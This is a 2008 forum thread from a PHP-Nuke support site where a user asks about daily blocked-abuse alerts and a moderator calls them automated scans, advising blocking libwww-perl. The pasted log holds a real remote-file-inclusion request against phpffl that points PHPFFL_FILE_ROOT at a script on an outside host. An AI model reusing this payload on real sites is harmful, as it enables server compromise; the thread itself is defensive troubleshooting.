PHP Web Host - Quality Web Hosting For All PHP Applications Sign up for PayPal and start accepting credit card payments instantly
  Login or Register
 • Home • Downloads • Your Account • Forums • 

View next topic
View previous topic


Google
 
Web RavenPHPScripts (This Site)
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.
Author Message
daverupe
New Member
New Member


Joined: Dec 30, 2005
Posts: 24

PostPosted: Mon Jun 30, 2008 9:59 pm Reply with quote Back to top

I'm getting about 10-20 Blocked Abuse emails a day for months now... Is something wrong? Also sometimes the remote address is my IP address (external). I am aware of a posted security vulnerability in a php app called phpffl. The issue has been addressed. Could this be some joker trying to exploit it? Thoughts or recommendations appreciated?

Below is a sample of what I get daily...

====================================

Date & Time: 2008-06-30 20:51:35 EDT GMT -0400
Blocked IP: 82.194.70.*
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: libwww-perl/5.805
Query String: xxx.xxx.xxx.xxx:8080/modules.php?name=Downloads/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://74.55.118.130/~consult/shop/classes/id.txt??
Get String: xxx.xxx.xxx.xxx:8080/modules.php?name=Downloads/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://74.55.118.130/~consult/shop/classes/id.txt??
Post String: xxx.xxx.xxx.xxx:8080/modules.php
Forwarded For: none
Client IP: none
Remote Address: 82.194.70.164
Remote Port: 43389
Request Method: GET
View user's profile Send private message
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Mon Jun 30, 2008 10:35 pm Reply with quote Back to top

These are all automated attempts. Basically they try any exploits, whether you are using a specific software/script/module or not.

Block libwww-perl, that will solve probably 80-90% of these. There are posts on the forum how to do this using .htaccess
View user's profile Send private message Visit poster's website
Display posts from previous:       
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
Forums ©
 

All logos and trademarks in this site are property of their respective owner.
The comments are property of their posters, all the rest © 2002-2011 by Raven

You can syndicate our news using the file xml

CSE HTML Validator Helped Clean up This Page! [Valid RSS] valid RSS 2.0 Valid robots.txt Stop Spam Harvesters, Join Project Honey Pot

Website engines core code is © copyright by PHP-Nuke but has been heavily patched and modified by myself and others.
PHP-Nuke is a free software released under the GNU/GPL.


:: fisubice phpbb2 style by Daz :: PHP-Nuke theme by www.nukemods.com ::
:: fisubice Theme Modified by the RavenNuke™ Team ::

:: W3C CSS Compliance Validation :: W3C HTML 4.01 Transitional Compliance Validation ::

zerosum